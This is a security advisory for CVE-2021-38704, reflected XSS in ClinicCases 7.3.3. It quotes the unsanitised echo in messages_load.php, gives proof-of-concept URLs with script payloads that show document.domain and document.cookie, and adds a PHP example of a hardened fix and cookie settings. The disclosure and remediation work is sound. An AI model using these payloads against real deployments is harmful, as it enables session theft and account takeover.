CVE-2021-38704
ClinicCases 7.3.3 Reflected Cross-Site Scripting (XSS)
Multiple reflected cross-site scripting (XSS) vulnerabilities in ClinicCases 7.3.3 allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft.
Detail
The HTTP GET parameter type is unsanitised and reflected in messages_load.php line 182.
echo "<div class='alert alert-danger' role='alert'>There are no messages in your $type folder</div>";

The following payload can be used to trigger a cross-site scripting attack when clicked by an authenticated user:

http://cliniccases.local/cliniccases/lib/php/data/messages_load.php?type=<script>alert(document.domain)</script>

As the PHPSESSID session cookie is insufficiently protected, it can be stolen by malicious JavaScript. This can be used for account takeover and session riding attacks.
http://cliniccases.local/cliniccases/lib/php/data/messages_load.php?type=<script>alert(document.cookie)</script>
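The following is an added illustration, not ClinicCases' own code, of the echo pattern quoted above placed beside a hardened equivalent, plus the session-cookie settings that blunt the cookie-theft impact. The function names, the folder list and the PHP 7.3+ array form of session_set_cookie_params() are assumptions made for this example; the real application's folder names may differ.

```php
<?php
// Added example (not ClinicCases' code): a stand-in for the messages_load.php
// pattern from the advisory, shown vulnerable and then hardened.

// Vulnerable pattern: the raw GET parameter is interpolated into HTML markup,
// so a value such as <script>...</script> is emitted as live script.
function render_empty_folder_vulnerable(string $type): string
{
    return "<div class='alert alert-danger' role='alert'>There are no messages in your $type folder</div>";
}

// Hardened version:
//  1. accept only a known folder name (allow-list; names are assumed here),
//  2. HTML-encode the value anyway before it reaches the response body,
//     so the fix does not depend on the allow-list staying complete.
function render_empty_folder_hardened(string $type): string
{
    $allowed = ['inbox', 'sent', 'archive']; // assumed folder names
    if (!in_array($type, $allowed, true)) {
        return "<div class='alert alert-danger' role='alert'>Unknown folder</div>";
    }
    $safe = htmlspecialchars($type, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<div class='alert alert-danger' role='alert'>There are no messages in your $safe folder</div>";
}

// Session cookie hardening (PHP 7.3+ array form): call before session_start()
// so PHPSESSID is not readable from document.cookie (HttpOnly), is only sent
// over HTTPS (Secure) and is not attached to cross-site requests (SameSite).
function start_hardened_session(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Demonstration with a constructed input shaped like the advisory's payload.
$input = $_GET['type'] ?? '<script>alert(document.domain)</script>';
echo render_empty_folder_vulnerable($input), PHP_EOL; // script tag survives intact
echo render_empty_folder_hardened($input), PHP_EOL;   // rejected by the allow-list
echo render_empty_folder_hardened('inbox'), PHP_EOL;  // normal case still renders
```

Run it from the command line (php example.php) to compare the three outputs; in the hardened path the markup never receives attacker-controlled text unencoded, and with HttpOnly set the document.cookie payload shown above would no longer expose PHPSESSID even if a reflection were missed elsewhere.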
